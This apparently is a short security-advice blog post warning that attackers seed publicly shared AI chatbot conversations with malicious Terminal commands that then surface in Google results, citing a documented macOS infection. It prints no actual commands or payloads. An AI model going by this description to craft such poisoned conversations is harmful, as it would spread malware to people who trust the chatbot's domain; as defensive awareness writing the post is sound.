When Google Points to a Chatbot Conversation, Be Skeptical

hand holding a magnifying glass in front of a screen full of blue checkmarks and one red alert box.

Here’s something new to watch out for: poisoned chatbot conversations surfaced in Google searches. The sharing features in ChatGPT, Claude, Gemini, Grok, and other chatbots allow users to publish their conversations as public Web pages, which can be indexed by search engines and appear alongside traditional websites in search results. Attackers can seed those conversations with malicious commands, and the conversations themselves look trustworthy in search results because the URL points to a well-known AI company. This risk isn’t theoretical—security firm Huntress documented a macOS malware infection that began with a Google search result linking to a shared chatbot conversation that contained malicious Terminal instructions. Treat chatbot conversations found via Google as you would random forum posts—potentially useful for background or ideas to start your own conversation, but not as authoritative instructions. Be especially suspicious when they offer step-by-step guidance or ask you to copy anything verbatim.

(Featured image by iStock.com/tadamichi)

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.